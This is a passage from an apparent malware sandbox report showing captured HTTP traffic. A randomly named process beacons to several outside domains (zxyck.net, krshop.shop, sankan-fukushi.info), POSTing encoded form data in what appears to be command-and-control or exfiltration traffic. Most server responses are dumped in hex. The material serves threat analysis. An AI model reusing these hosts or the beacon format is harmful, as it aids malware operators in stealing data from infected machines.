                                                                                      Data Ascii: 001-1.422.415-1.763 1.074-.433.825-.244 1.839.456 2.453.692.608 1.712.659 2.461.122l.261-.187h.008c.366-.378.57-.882.571-1.408.015-.539-.188-1.061-.564-1.448-.375-.387-.891-.606-1.43-.607v.001zm-19.426-13.156l-.334-.854 3.756-1.852 4.906-2.391


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      20192.168.2.849737163.44.185.183806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:14.804229975 CET517OUTGET /qq1e/?UbRxm=DayBJHTwMg56rcld9n6KWZbVQKFRYd6Y2OVvMB/QfV+VoLW2vz3Ysj2Lu1Mz5EvoA06VXqhN10X9MeLBCKiZ8LZ2VXddbMNCxmaFYlM5w9+CsZ6D34cvk8XDh8Pk/EneAg==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.sankan-fukushi.info
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:57:16.247544050 CET1236INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 25 Nov 2024 12:57:16 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 19268
                                                                                      Connection: close
                                                                                      Server: Apache
                                                                                      Last-Modified: Tue, 25 Jan 2022 07:25:35 GMT
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html lang="ja"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>404 Error - Not Found</title> <style> html,body,h1,p { margin: 0; padding: 0; } body,html { height: 100%; text-align: center; font-family: -apple-system, BlinkMacSystemFont, YakuHanJP, Helvetica, , "Hiragino Sans", " ProN W3", "Hiragino Kaku Gothic ProN", Verdana, Meiryo, sans-serif; background: #fff; color: #403230; } .container { padding: 60px 30px; } @media screen and (min-width: 640px) { .container { padding: 100px 30px; } } h1 { letter-spacing: 0.05em; font-size: 2.4rem; margin-bottom: 20px; } a { color: #147EF0; } .lol-error-page__caption { text-align: center; font-size: 1rem; [TRUNCATED]
                                                                                      Nov 25, 2024 13:57:16.247561932 CET224INData Raw: 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 37 32 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6c 2d 65 72 72 6f 72 2d 70 61 67 65 5f 5f 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a
                                                                                      Data Ascii: line-height: 1.72; } .lol-error-page__information { display: -webkit-flex; display: -ms-flexbox; display: flex; -webkit-justify-content: center; -ms-flex-pack: ce
                                                                                      Nov 25, 2024 13:57:16.247575045 CET1236INData Raw: 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20
                                                                                      Data Ascii: nter; justify-content: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-flex-wrap: wrap; -ms-flex-wrap: wrap; flex-wrap: wrap;
                                                                                      Nov 25, 2024 13:57:16.247639894 CET1236INData Raw: 65 72 2d 72 61 64 69 75 73 3a 20 36 70 78 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 63 33 3b 0a 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c
                                                                                      Data Ascii: er-radius: 6px; background: #fc3; -webkit-order: 1; -ms-flex-order: 1; order: 1; } .lol-error-page__information-balloon::after { position: absolute; z-index: 1; bottom: -8px;
                                                                                      Nov 25, 2024 13:57:16.247672081 CET1236INData Raw: 72 2d 70 61 67 65 5f 5f 61 64 2d 62 61 6e 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 35 70 78 20 61 75 74 6f 20 32 30 70 78 3b 0a 20 20 20
                                                                                      Data Ascii: r-page__ad-banner { text-align:center; margin: 15px auto 20px; } .lol-error-page__ad-banner-holizontal { width: 300px; height: auto; margin: auto; } @media screen and (min-width:
                                                                                      Nov 25, 2024 13:57:16.247689962 CET1236INData Raw: 30 22 20 68 65 69 67 68 74 3d 22 31 34 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 35 20 31 34 38 22 3e 3c 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 66 36 30 22 20 64 3d 22 4d 38 37 2e 37 20 35 32
                                                                                      Data Ascii: 0" height="142" viewBox="0 0 105 148"><g fill="none"><path fill="#f60" d="M87.7 52.376c-.742-3.291-1.243-6.631-1.5-9.994.943-3.251 4.968-18.858-3.232-30.342-5.627-7.931-15.639-12.04-29.9-12.04h-.329c-14.1 0-24.317 3.988-30.153 11.86-9.4 12.507
                                                                                      Nov 25, 2024 13:57:16.247709990 CET1236INData Raw: 2e 35 35 37 20 31 2e 34 34 31 2e 33 31 35 20 32 2e 39 31 38 2d 2e 33 35 32 20 33 2e 36 33 36 2d 31 2e 36 34 31 2e 38 35 31 2d 31 2e 39 34 31 20 31 2e 32 39 33 2d 34 2e 30 33 37 20 31 2e 33 2d 36 2e 31 35 36 2e 32 35 38 2d 32 2e 30 38 34 2e 30 39
                                                                                      Data Ascii: .557 1.441.315 2.918-.352 3.636-1.641.851-1.941 1.293-4.037 1.3-6.156.258-2.084.09-4.199-.494-6.216-.544-1.376-1.926-2.233-3.4-2.107l-.402-.015z"/><path fill="#f60" d="M51.976 102.7c-.463 0-.908-.179-1.242-.5l-11.044-10.527c-.401-.39-.6-.944-.
                                                                                      Nov 25, 2024 13:57:16.247723103 CET552INData Raw: 2d 31 2e 39 33 32 2d 31 2e 32 34 36 2d 34 2e 30 31 31 2d 31 2e 32 34 31 2d 36 2e 31 31 31 2d 2e 33 38 39 2d 36 2e 37 38 38 20 31 2e 30 33 33 2d 38 2e 31 32 37 20 33 2e 39 36 36 2d 38 2e 32 39 33 68 2e 34 63 2e 33 39 32 2d 2e 30 31 33 2e 37 38 33
                                                                                      Data Ascii: -1.932-1.246-4.011-1.241-6.111-.389-6.788 1.033-8.127 3.966-8.293h.4c.392-.013.783.049 1.152.181-.185 1.468-.28 2.946-.284 4.425-.01 3.674.495 7.332 1.5 10.866l-.072.061zm26.365 19.475h-.15c-10.071 0-18.9-8.293-22.447-19.566.168-1.605.117-3.22
                                                                                      Nov 25, 2024 13:57:16.247735977 CET1236INData Raw: 2e 33 34 38 20 33 2e 32 30 39 2d 2e 31 39 35 20 34 2e 38 31 36 2d 33 2e 37 33 20 31 31 2e 32 32 37 2d 31 32 2e 35 37 34 20 31 39 2e 33 38 34 2d 32 32 2e 35 35 35 20 31 39 2e 33 38 34 7a 6d 33 32 2e 39 32 32 2d 32 36 2e 34 34 33 63 2d 2e 30 31 31
                                                                                      Data Ascii: .348 3.209-.195 4.816-3.73 11.227-12.574 19.384-22.555 19.384zm32.922-26.443c-.011 2.098-.449 4.172-1.287 6.095-.718 1.289-2.195 1.956-3.636 1.641-.647.037-1.286-.161-1.8-.557v-.075c1.028-3.526 1.556-7.178 1.571-10.851.003-1.479-.08-2.956-.25-
                                                                                      Nov 25, 2024 13:57:16.247782946 CET1236INData Raw: 33 2d 31 2e 31 32 33 20 35 2e 37 31 39 2d 2e 35 38 31 20 37 2e 38 32 36 20 31 2e 33 38 35 2e 34 36 38 2e 35 32 33 2e 35 39 20 31 2e 32 37 2e 33 31 34 20 31 2e 39 31 35 2d 2e 32 37 36 2e 36 34 35 2d 2e 39 30 31 20 31 2e 30 37 32 2d 31 2e 36 30 32
                                                                                      Data Ascii: 3-1.123 5.719-.581 7.826 1.385.468.523.59 1.27.314 1.915-.276.645-.901 1.072-1.602 1.095l-.013.06z"/><path fill="#fff" d="M56.39 64.973l-4.115 1.46-4.115-1.5"/><path fill="#f60" d="M52.26 68.239c-.209.001-.417-.035-.614-.105l-4.115-1.5c-.917-.
                                                                                      Nov 25, 2024 13:57:16.368774891 CET1236INData Raw: 2e 31 31 31 2d 2e 31 34 37 63 2d 2e 33 34 33 2d 2e 34 35 39 2d 2e 37 2d 2e 39 33 34 2d 31 2e 30 33 37 2d 31 2e 34 33 33 6c 2d 2e 31 35 38 2d 2e 32 33 38 63 2d 2e 33 37 32 2d 2e 35 33 37 2d 2e 37 34 2d 31 2e 31 30 38 2d 31 2e 31 32 33 2d 31 2e 37
                                                                                      Data Ascii: .111-.147c-.343-.459-.7-.934-1.037-1.433l-.158-.238c-.372-.537-.74-1.108-1.123-1.724l-.442-.736-.214-.365-.431-.748c-1.299-2.367-2.416-4.83-3.342-7.366-1.876-5.242-3.133-10.686-3.746-16.22l1.927-.47 2.274 5.9c.088.224.271.396.5.47l.241.038c.15


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      21192.168.2.849738118.107.250.103806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:22.406580925 CET749OUTPOST /z2jp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.zxyck.net
                                                                                      Origin: http://www.zxyck.net
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.zxyck.net/z2jp/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 44 46 71 65 4f 66 46 2f 6d 5a 6f 43 6c 54 42 70 4c 57 32 41 74 75 57 64 5a 52 6f 4d 59 74 48 62 39 76 67 58 65 4d 45 49 68 59 33 50 77 6d 6b 52 4e 4b 74 44 47 68 59 58 57 41 73 72 36 74 39 77 56 66 46 66 6e 4d 2b 41 68 58 43 59 6c 56 67 6c 53 61 64 34 66 41 42 50 37 2b 61 71 35 5a 30 53 7a 52 68 51 42 51 79 64 6f 62 2b 54 55 54 59 46 31 4d 6d 66 56 44 4a 79 46 53 4c 6a 67 78 36 42 71 63 44 50 39 54 67 46 61 33 54 5a 4e 55 6d 6a 61 79 41 50 77 76 58 67 44 37 64 77 4d 73 74 53 48 56 78 42 6c 63 53 69 30 62 48 7a 43 71 36 44 7a 36 4e 6c 78 72 54 62 2f 44 4c 31 54 39 6e 30 46 36 6d 56 41 4a 49 3d
                                                                                      Data Ascii: UbRxm=DFqeOfF/mZoClTBpLW2AtuWdZRoMYtHb9vgXeMEIhY3PwmkRNKtDGhYXWAsr6t9wVfFfnM+AhXCYlVglSad4fABP7+aq5Z0SzRhQBQydob+TUTYF1MmfVDJyFSLjgx6BqcDP9TgFa3TZNUmjayAPwvXgD7dwMstSHVxBlcSi0bHzCq6Dz6NlxrTb/DL1T9n0F6mVAJI=
                                                                                      Nov 25, 2024 13:57:23.917579889 CET307INHTTP/1.1 200 OK
                                                                                      Server: Tengine
                                                                                      Date: Mon, 25 Nov 2024 12:56:23 GMT
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 32 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc 54 20 cb 28 ab 40 0f 00 ae fc 5f dc 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2d///lT (@_0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.849739118.107.250.103806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:25.258889914 CET769OUTPOST /z2jp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.zxyck.net
                                                                                      Origin: http://www.zxyck.net
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.zxyck.net/z2jp/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 44 46 71 65 4f 66 46 2f 6d 5a 6f 43 6b 79 52 70 4e 32 4b 41 6f 4f 57 65 56 78 6f 4d 54 4e 48 6c 39 76 6b 58 65 4f 70 56 69 71 54 50 78 43 30 52 4c 34 56 44 48 68 59 58 65 67 73 75 69 4e 39 6e 56 66 5a 74 6e 4f 36 41 68 58 2b 59 6c 51 63 6c 53 70 6c 33 66 51 42 61 77 65 61 73 39 5a 30 53 7a 52 68 51 42 51 57 7a 6f 62 47 54 58 6a 6f 46 30 75 65 65 55 44 4a 31 56 43 4c 6a 72 52 36 2f 71 63 43 71 39 53 4d 76 61 31 72 5a 4e 52 43 6a 61 6a 41 4d 36 76 58 6d 4a 62 64 6c 63 64 63 72 41 32 4a 61 76 76 65 32 33 4e 61 4c 44 63 4c 70 70 59 46 6a 79 72 37 77 2f 41 6a 44 57 4b 36 63 66 5a 32 6c 65 65 63 33 62 62 62 36 69 46 63 61 32 2f 54 67 54 46 66 78 6c 41 6e 63
                                                                                      Data Ascii: UbRxm=DFqeOfF/mZoCkyRpN2KAoOWeVxoMTNHl9vkXeOpViqTPxC0RL4VDHhYXegsuiN9nVfZtnO6AhX+YlQclSpl3fQBaweas9Z0SzRhQBQWzobGTXjoF0ueeUDJ1VCLjrR6/qcCq9SMva1rZNRCjajAM6vXmJbdlcdcrA2Javve23NaLDcLppYFjyr7w/AjDWK6cfZ2leec3bbb6iFca2/TgTFfxlAnc
                                                                                      Nov 25, 2024 13:57:26.649008989 CET307INHTTP/1.1 200 OK
                                                                                      Server: Tengine
                                                                                      Date: Mon, 25 Nov 2024 12:56:26 GMT
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 32 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc 54 20 cb 28 ab 40 0f 00 ae fc 5f dc 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2d///lT (@_0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.849740118.107.250.103806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:28.120556116 CET1786OUTPOST /z2jp/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.zxyck.net
                                                                                      Origin: http://www.zxyck.net
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1242
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.zxyck.net/z2jp/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 44 46 71 65 4f 66 46 2f 6d 5a 6f 43 6b 79 52 70 4e 32 4b 41 6f 4f 57 65 56 78 6f 4d 54 4e 48 6c 39 76 6b 58 65 4f 70 56 69 71 62 50 78 77 38 52 4e 76 42 44 57 52 59 58 51 41 73 76 69 4e 38 6c 56 66 42 70 6e 4f 6e 31 68 52 79 59 6c 79 6b 6c 55 59 6c 33 51 51 42 61 2f 2b 61 74 35 5a 31 47 7a 52 78 55 42 51 47 7a 6f 62 47 54 58 6c 45 46 39 63 6d 65 5a 6a 4a 79 46 53 4c 47 67 78 37 53 71 63 62 58 39 53 4a 59 61 46 4c 5a 4d 33 69 6a 64 52 59 4d 32 76 58 6b 4b 62 63 67 63 64 51 4b 41 79 70 67 76 73 43 63 33 4b 32 4c 44 70 71 72 75 37 31 34 68 59 50 75 38 44 76 53 54 4e 61 6e 61 37 4f 34 43 2b 64 54 61 65 4c 45 72 48 52 51 37 5a 69 4c 47 53 4f 6d 73 45 4b 33 74 33 72 54 51 45 6d 6d 48 43 4e 4c 77 6d 43 72 41 79 35 43 69 33 6b 2f 74 4a 31 4b 33 42 6f 47 63 6d 5a 32 70 34 57 4e 73 52 33 4e 61 6e 45 54 74 4c 52 39 79 70 6f 67 6d 6a 51 67 72 44 4e 4b 66 46 67 53 72 74 75 51 4f 66 46 72 52 46 4d 61 6f 35 66 39 6d 4b 75 73 58 47 35 48 74 48 78 57 77 37 44 78 47 6d 70 75 6d 4b 2f 67 7a 4e 38 63 [TRUNCATED]
                                                                                      Data Ascii: UbRxm=DFqeOfF/mZoCkyRpN2KAoOWeVxoMTNHl9vkXeOpViqbPxw8RNvBDWRYXQAsviN8lVfBpnOn1hRyYlyklUYl3QQBa/+at5Z1GzRxUBQGzobGTXlEF9cmeZjJyFSLGgx7SqcbX9SJYaFLZM3ijdRYM2vXkKbcgcdQKAypgvsCc3K2LDpqru714hYPu8DvSTNana7O4C+dTaeLErHRQ7ZiLGSOmsEK3t3rTQEmmHCNLwmCrAy5Ci3k/tJ1K3BoGcmZ2p4WNsR3NanETtLR9ypogmjQgrDNKfFgSrtuQOfFrRFMao5f9mKusXG5HtHxWw7DxGmpumK/gzN8c9GVhaD91DFus/mZYVy4JLLVk2+ax927evguR1XGPNrpFGywC3wsjy8/bDS822bKXlYplmNnJt79Jfd0U9lne4ojqzDDWyh++FxG5oa27kk/dsSHua4hhfEigyDmuyCalCu38kvAbyfrK3wNzf92d66Xugsqx7sWH2E49t5Opo4wqH162yi+jYzgQrMFuGAN5KQ5qCkJwEZ5y3Aevc2LB0MG4VkTxnSUW+JapdSs+5e+cVcIrfqsbCukMAj1KWhkLLGRWJDYgN8QdzirTm0Vwl88odmeH5insOoaYAlTxNj+QvrQ8FqNkVz9fuGBxf806hT9+7gNwT/urZzFyQQWi9GhtLGGU5D98ijygJD/LC5TZjy4XKZgIj5oIISPLYm4PtMwpH71an4qZwRBSikmB1mV2ZmJU3OomV5W4UCe6NuB/qvsOZzTVhH5qQvusZ+prcGvi57J9mkMiR+YHAkoiDbwsEfOWU/P9zERjy7YveQWD/ZkEA+6cvlsI8tf0h0W62mw+IlwKoJmOP6Bj+pAsoUNf2PyTl+k7TOaADwsM4uH5gksPGDXey6+Tda4HtOMTmNbYPiYdBw01kCKP+GrhKej1rnIXAjiZhj/dgLzzMFZnVVTUROskEwj6bzh709j84E/LeC3yUD3mT1zbifAEXGPLzIdMbpur28 [TRUNCATED]
                                                                                      Nov 25, 2024 13:57:29.715142012 CET307INHTTP/1.1 200 OK
                                                                                      Server: Tengine
                                                                                      Date: Mon, 25 Nov 2024 12:56:29 GMT
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 32 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 d3 2f 2f 2f d7 07 e2 a2 fc fc 12 fd aa 8a ca e4 6c bd bc 54 20 cb 28 ab 40 0f 00 ae fc 5f dc 1c 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 2d///lT (@_0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      24192.168.2.849741118.107.250.103806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:30.943825960 CET507OUTGET /z2jp/?UbRxm=OHC+NpFe2K8jmTlicXvXjJ+QVEgSatfCtasqPMFJtNXA1CIQdaIwTH1aekp09+pbZOA1peX5og6OyDAWYalTXTww0fqX4q90/3pIZSi2lNK2VQoZjt3+Z09NDWePsk/Y+A==&YvA4=xnL8AvI8CJiPEDU HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.zxyck.net
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Nov 25, 2024 13:57:32.408495903 CET266INHTTP/1.1 200 OK
                                                                                      Server: Tengine
                                                                                      Date: Mon, 25 Nov 2024 12:56:31 GMT
                                                                                      Content-Type: text/html;charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Vary: Accept-Encoding
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Data Raw: 31 63 0d 0a 2f 77 77 77 2f 77 77 77 72 6f 6f 74 2f 7a 78 79 63 6b 2e 6e 65 74 2f 7a 32 6a 70 2e 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 1c/www/wwwroot/zxyck.net/z2jp.0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      25192.168.2.84974213.248.169.48806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:38.048593998 CET755OUTPOST /grhe/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.krshop.shop
                                                                                      Origin: http://www.krshop.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 206
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.krshop.shop/grhe/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                                                                                      Data Raw: 55 62 52 78 6d 3d 4e 46 35 39 56 30 38 72 61 6e 7a 68 36 72 79 53 55 6c 46 79 42 2b 30 41 59 37 50 73 37 65 77 59 4c 38 2b 61 4c 6b 44 5a 64 4c 4d 4e 65 62 6c 68 41 4c 68 2f 74 6b 44 4f 47 61 4a 48 67 45 4d 55 71 32 4b 47 4a 58 43 39 72 73 6d 5a 57 50 43 32 4d 68 42 34 63 38 4d 4f 33 62 2f 43 63 2f 33 34 51 55 63 68 4c 50 71 31 2f 30 36 79 74 77 33 4a 41 2b 70 33 5a 67 61 42 39 49 54 70 32 38 37 76 6e 37 4b 32 38 65 5a 67 78 2f 67 39 56 74 6f 5a 4b 46 42 4f 58 61 74 32 41 38 61 44 72 42 68 31 6c 53 53 36 4d 57 77 30 58 53 56 53 62 74 6a 6e 71 51 6d 6f 51 49 42 2f 57 45 6e 36 30 54 6e 44 62 61 44 6d 4e 49 67 3d
                                                                                      Data Ascii: UbRxm=NF59V08ranzh6rySUlFyB+0AY7Ps7ewYL8+aLkDZdLMNeblhALh/tkDOGaJHgEMUq2KGJXC9rsmZWPC2MhB4c8MO3b/Cc/34QUchLPq1/06ytw3JA+p3ZgaB9ITp287vn7K28eZgx/g9VtoZKFBOXat2A8aDrBh1lSS6MWw0XSVSbtjnqQmoQIB/WEn60TnDbaDmNIg=


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.84974313.248.169.48806380C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 13:57:40.815093994 CET775OUTPOST /grhe/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Host: www.krshop.shop
                                                                                      Origin: http://www.krshop.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 226
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Referer: http://www.krshop.shop/grhe/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; HM NOTE 1LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
